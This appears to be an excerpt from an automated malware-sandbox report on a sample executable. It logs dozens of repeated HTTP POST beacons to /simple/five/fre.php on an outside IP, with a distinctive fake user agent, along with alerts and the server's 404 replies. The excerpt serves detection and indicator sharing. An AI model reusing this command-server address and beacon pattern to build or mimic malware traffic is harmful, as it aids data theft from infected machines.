Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 153Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.41

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Code function: 0_2_00404ED4 recv,

0_2_00404ED4

Source: unknown

HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 180Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:42:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
